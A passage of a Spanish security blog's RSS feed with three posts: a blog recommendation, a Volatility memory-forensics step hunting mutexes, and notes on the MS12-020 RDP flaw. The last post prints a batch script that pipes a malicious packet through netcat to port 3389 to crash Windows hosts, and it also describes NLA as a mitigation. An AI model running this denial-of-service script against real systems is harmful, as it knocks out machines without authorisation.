		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/05/sapao.png?w=300" medium="image">
			<media:title type="html">sapao</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/05/nist1.png?w=300" medium="image">
			<media:title type="html">nist1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/05/sans.png?w=300" medium="image">
			<media:title type="html">sans</media:title>
		</media:content>
	</item>
		<item>
		<title>Blogs.update(&#8220;Unlearning Security&#8221;)</title>
		<link>http://windowstips.wordpress.com/2012/05/07/blogs-updateunlearning-security/</link>
		<comments>http://windowstips.wordpress.com/2012/05/07/blogs-updateunlearning-security/#comments</comments>
		<pubDate>Mon, 07 May 2012 08:00:39 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Diario]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Varios]]></category>
		<category><![CDATA[unlearningsecurity]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=931</guid>
		<description><![CDATA[Hola a tod@s! Llevaba este post (y unos cuantos más) medio escrito en los borradores que tengo. Y hoy he dicho&#8230; Cojones! De hoy no pasa! Comenzar algo casi siempre es bonito. Muchas veces lo hacemos con miedo, otras con ilusión, otras porque no quedan más cojones, y otras&#8230; Pues porque sí. A todo el [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=931&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>Llevaba este post (y unos cuantos más) medio escrito en los borradores que tengo. Y hoy he dicho&#8230; Cojones! De hoy no pasa!</p>
<p>Comenzar algo casi siempre es bonito. Muchas veces lo hacemos con miedo, otras con ilusión, otras porque no quedan más cojones, y otras&#8230; Pues porque sí.</p>
<p>A todo el que me conoce un poco, y me pregunta por el blog, siempre le comento lo mismo. Que utilicé el blog para no tener que acordarme de ciertas cosas que me parecían y parecen interesantes. La cosa llegó a más y hoy, años después, todavía estamos aquí. Me gusta almacenar cosas! Soy muy 1.0!!</p>
<p>Hoy día lanzo la vista atrás, y la de gente que he tenido el honor de conocer gracias a este blog ha sido inmensa. Si no hubiese tenido ese pensamiento 1.0, donde andaría!</p>
<p>Es por ello, que cuando alguien &#8220;se atreve&#8221; a exponer al mundo sus ideas y conocimientos, hay que aplaudirlo. Y más aún cuando lo que publicas es bueno. Y ese es el caso de mi compañero y amigo Daniel Romero.</p>
<p>Lo conocí en la guarida de I64, y desde aquel día, no he parado de aprender de él. Un tío que se atreve con todo en materia de seguridad, pero en especial por las auditorías Web. Gracias a él, he llevado con éxito alguna auditoría que otra, y siempre que le he pedido ayuda, tanto en lo profesional como en lo personal, ha estado ahí para echarme un cable.</p>
<p>Aunque a simple vista no os suene de mucho, él fue el desarrollador de la primera versión de Marmita, por ejemplo. Testigo que han cogido los Monstruos (y no de feos) Francisco Oca y Manu Fernández, creadores de la FOCA, entre otras herramientas públicas y privadas.</p>
<p>Pues bien, Dani abrió un blog no hace mucho, y como no podía ser de otra forma, no ha parado de crecer, gracias a su contenido, y su continente. Artículos perfectamente redactados (no como los míos jaja) y bajo un contexto de formación, dan salida a verdaderas &#8220;joyas en materia de seguridad&#8221;, como los artículos dedicados a la <a href="http://unlearningsecurity.blogspot.com.es/2012/04/documento-explotacion-de.html" target="_blank">explotación de vulnerabilidades</a>, o los artículos dedicados a la <a href="http://unlearningsecurity.blogspot.com.es/2012/02/introduccion-la-ingenieria-inversa-x86.html" target="_blank">ingeniería inversa en arquitecturas basadas en X86</a>. Estos artículos, han dado pie a que se publiquen en <a href="http://packetstormsecurity.org/files/110552/Introduction-To-Reverse-Engineering-x86.html" target="_blank">packetstormsecurity</a>. Como diríamos en mi tierra&#8230;. FITE!!!</p>
<p>Así que nada, actualizar los RSS, y aplaudamos a otro &#8220;grande&#8221;.</p>
<p>Gracias por compartir tus conocimientos Dani!</p>
<p>Saludos a tod@s!!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/931/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/931/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=931&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/05/07/blogs-updateunlearning-security/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>
	</item>
		<item>
		<title>A la caza del mutante, parte IV</title>
		<link>http://windowstips.wordpress.com/2012/05/03/a-la-caza-del-mutante-parte-iv/</link>
		<comments>http://windowstips.wordpress.com/2012/05/03/a-la-caza-del-mutante-parte-iv/#comments</comments>
		<pubDate>Thu, 03 May 2012 08:35:45 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[forense]]></category>
		<category><![CDATA[mutant]]></category>
		<category><![CDATA[mutex]]></category>
		<category><![CDATA[ram]]></category>
		<category><![CDATA[volatility]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=924</guid>
		<description><![CDATA[Parte I Parte II Parte III Parte V Hola a tod@s! En esta penúltima parte, vamos a realizar la búsqueda de MUTANT (MUTEX), a través de la herramienta volatility, y realizando para ello un análisis forense offline. Para poder realizar esta búsqueda con éxito, el gran Andreas Schuster implementa un módulo para volatility, a través del [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=924&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p><a href="http://windowstips.wordpress.com/2011/12/02/a-la-caza-del-mutante-parte-i/">Parte I</a></p>
<p><a href="http://windowstips.wordpress.com/2011/12/12/a-la-caza-del-mutante-parte-ii/">Parte II</a></p>
<p><a href="http://windowstips.wordpress.com/2012/01/22/a-la-caza-del-mutante-parte-iii/">Parte III</a></p>
<p>Parte V</p>
<p>Hola a tod@s!</p>
<p>En esta penúltima parte, vamos a realizar la búsqueda de MUTANT (MUTEX), a través de la herramienta volatility, y realizando para ello un análisis forense offline.</p>
<p>Para poder realizar esta búsqueda con éxito, el gran Andreas Schuster implementa un módulo para volatility, a través del cual,  y resumido en pocas palabras, realiza una búsqueda de la cadena <strong>Mut? </strong>En memoria paginada y no paginada.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/05/volatility1.png"><img class="size-medium wp-image-926 aligncenter" title="Volatility1" src="https://windowstips.files.wordpress.com/2012/05/volatility1.png?w=300&#038;h=74" alt="" width="300" height="74" /></a></p>
<p align="center">Imagen 1.- Búsqueda de cadena Mut?</p>
<p style="text-align:left;" align="center"> El resultado es increíble, extrayendo no sólo la dirección de memoria y el nombre del Mutant, si no también información interesantísima, como por ejemplo el identificador de proceso (Client ID) que lo tiene referenciado.</p>
<p style="text-align:left;" align="center"><a href="https://windowstips.files.wordpress.com/2012/05/volatility.png" target="_blank"><img class="size-medium wp-image-927 aligncenter" title="Volatility" src="https://windowstips.files.wordpress.com/2012/05/volatility.png?w=300&#038;h=284" alt="" width="300" height="284" /></a></p>
<p align="center">Imagen 2.- Aplicación del módulo MutantScan en Volatility</p>
<p>En la próxima y última entrega, analizaremos la memoria offline, e intentaremos buscar evidencias, partiendo de los mismos principios que el estudio de Andreas Schuster. Lo único que vamos a cambiar esta vez, será la herramienta. En vez de utilizar Volatility Framework, se utilizará la herramienta WinDBG (Debugging Tools for Windows), y realizando las consultas de forma manual.</p>
<p>Saludetes!!</p>
<p>Referencias</p>
<p><a href="http://computer.forensikblog.de/en/2009/04/searching_for_mutants.html" target="_blank">Searching for Mutants</a></p>
<p><a href="http://msdn.moonsols.com/win7rtm_x86/KMUTANT.html" target="_blank">_KMUTANT Structure</a></p>
<p><a href="http://msdn.microsoft.com/en-us/library/ff564696(v=vs.85).aspx" target="_blank">Poolfind (MDSN)</a></p>
<p style="text-align:left;" align="center">
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/924/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/924/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=924&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/05/03/a-la-caza-del-mutante-parte-iv/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/05/volatility1.png?w=300" medium="image">
			<media:title type="html">Volatility1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/05/volatility.png?w=300" medium="image">
			<media:title type="html">Volatility</media:title>
		</media:content>
	</item>
		<item>
		<title>Algunas notas sobre el exploit MS12-020</title>
		<link>http://windowstips.wordpress.com/2012/03/19/algunas-notas-sobre-el-exploit-ms12-020/</link>
		<comments>http://windowstips.wordpress.com/2012/03/19/algunas-notas-sobre-el-exploit-ms12-020/#comments</comments>
		<pubDate>Mon, 19 Mar 2012 11:24:53 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[RDP]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Terminal Server]]></category>
		<category><![CDATA[Vista]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[ms12-020]]></category>
		<category><![CDATA[terminal server]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=915</guid>
		<description><![CDATA[Hola a tod@s! Llevo unos 3 días informándome sobre la vulnerabilidad que afecta a todos los servicios de Terminal Server, y he aquí la información que puedo aportar al respecto de leer y releer scripts e información adicional. Después de leer en mi RSS post similares con información relativa a exploits públicos, los cuales revelaban [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=915&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>Llevo unos 3 días informándome sobre la vulnerabilidad que afecta a todos los servicios de Terminal Server, y he aquí la información que puedo aportar al respecto de leer y releer scripts e información adicional.</p>
<p>Después de leer en mi RSS post similares con información relativa a exploits públicos, los cuales revelaban que habían conseguido ejecutar código remoto , me puse a buscar dichos exploits.</p>
<p>El único que he encontrado, a simple vista parece que lanza una shellcode escuchando en el puerto 4444 de la posible “víctima”. Nada más lejos de la realidad.</p>
<p>Estuve como 45 minutos de mi triste vida intentando buscar algún port de RDP en python sin éxito. Así que estuve leyendo cosas relacionadas con el proyecto FreeRDP, para al final, confirmarse la sospecha de que el script que se encuentra publicado en Pastebin es un puto fake como una catedral, y que me costó cerca de una hora de mi vida.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/03/fake.png" target="_blank"><img class="size-medium wp-image-916 aligncenter" title="Fake" src="https://windowstips.files.wordpress.com/2012/03/fake.png?w=300&#038;h=204" alt="" width="300" height="204" /></a></p>
<p style="text-align:center;">Imagen 1.- FAKE como una catedral</p>
<p>El siguiente script que probé,  es el ya archiconocido exploit chino, el cual lleva código robado de un partner de Microsoft. En un principio se habló de una filtración en ZDI, pero Microsoft ha acabado confirmando que se ha tratado de una filtración a través de uno de sus partners.</p>
<p>Este exploit funciona a la perfección, pero sólo en Windows 7. He probado en un Windows XP SP3 en Spanish, y no causa ningún efecto en el sistema, salvo que éste consume todos los recursos a nivel de CPU, permaneciendo al 100% en la ejecución del exploit.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/03/percent.png" target="_blank"><img class="size-medium wp-image-917 aligncenter" title="percent" src="https://windowstips.files.wordpress.com/2012/03/percent.png?w=271&#038;h=300" alt="" width="271" height="300" /></a></p>
<p style="text-align:center;">Imagen 2.- 100 % CPU exploit ms12-020</p>
<p>Como he comentado antes, en Windows 7 y Windows Server 2008 funciona a la perfección, pero es posible mitigar en parte este ataque, configurando el equipo para que sólo permita la autenticación basada en NLA (Network Level Authentication). Cuando configuramos esta opción, a la hora de negociar una conexión RDP contra un Server 2K8 o un Wiindows Vista/7, se obliga a autenticarse primero al cliente, antes de que el equipo que hace las veces de servidor establezca una sesión completa RDP. Esta configuración, mitigaría cualquier ataque de denegación de servicio de forma automatizada, debido a la no disponibilidad de usuario y password. En el caso de que se conozca un usuario y password de RDP, se podría seguir explotando el fallo, y automatizándolo con scripts.</p>
<p>Sin duda alguna, el que me ha funcionado a la perfección tanto en Windows XP como en Windows 7, ha sido el paquete de demostración que ha publicado el descubridor del fallo Luigi Auriemma. El paquete de demostración lo tiene publicado en el advisory ampliamente comentado en otros blogs y foros de internet, y funciona perfectamente.</p>
<p>En el propio Advisory, Luigi explica que en algunas ocasiones, se hace necesario realizar varias veces el envío del paquete malicioso para que Windows suelte un bonito BSOD, así que dicho y hecho! Como hay publicados ya muchos exploits en Python, Ruby, C y demás lenguajes, yo para probar mis sistemas he decidido realizar un cutre script en BATCH (Con dos cojones <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> ) haciendo llamadas a netcat para que realice un envío del paquete malicioso.</p>
<p>Probando en Windows XP y Windows 7 con el paquete mágico, con sólo el envío de 4 paquetes los dos sistemas pintan un bonito BSOD. El cutre código (Of course) aquí:</p>
<pre class="brush: plain; title: ; notranslate">
 @echo off
 echo .
 echo ##################################################################################
 echo # MS12-020 cutre script BSOD Exploit
 echo # Juan Garrido http://windowstips.wordpress.com
 echo # Tested on XPSP3 And Windows 7 32 bits
 echo # Windows 7 With NLA (NetWork Level Authentication) not Working
 echo # See more http://technet.microsoft.com/en-us/security/bulletin/ms12-020
 echo ##################################################################################
 if &quot;%1&quot;==&quot;&quot; GOTO msg
 set _IP=%1
 set _Netcat=nc.exe %_IP% 3389 ^&lt; termdd_1.dat
 :RUN
 FOR /L %%i IN (1,1,5) DO %_Netcat%
 GOTO end
 :msg
 echo ERROR: Specify a hostname or IP address.
 echo i.e. %0 HOSTNAME
 goto end
 :end
 pause
 </pre>
<p>Salu2 a tod@s!</p>
<p>&nbsp;</p>
<p><strong>Referencias</strong></p>
<p><a href="https://github.com/FreeRDP/FreeRDP">https://github.com/FreeRDP/FreeRDP</a></p>
<p><a href="http://pastebin.com/fFWkezQH">http://pastebin.com/fFWkezQH</a> (FAKE como una catedral)</p>
<p><a href="http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx">http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx</a></p>
<p><a href="http://pastebin.com/jzQxvnpj">http://pastebin.com/jzQxvnpj</a> (Exploit funcional Windows 7)</p>
<p><a href="http://technet.microsoft.com/en-us/library/cc732713.aspx">http://technet.microsoft.com/en-us/library/cc732713.aspx</a> (Network Level Authentication)</p>
<p><a href="http://aluigi.org/adv/termdd_1-adv.txt">http://aluigi.org/adv/termdd_1-adv.txt</a> (Advisory explicando la vulnerabilidad MS12-020)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/915/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/915/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=915&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/03/19/algunas-notas-sobre-el-exploit-ms12-020/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/03/fake.png?w=300" medium="image">
			<media:title type="html">Fake</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/03/percent.png?w=271" medium="image">
			<media:title type="html">percent</media:title>
		</media:content>
	</item>
	</channel>
</rss>
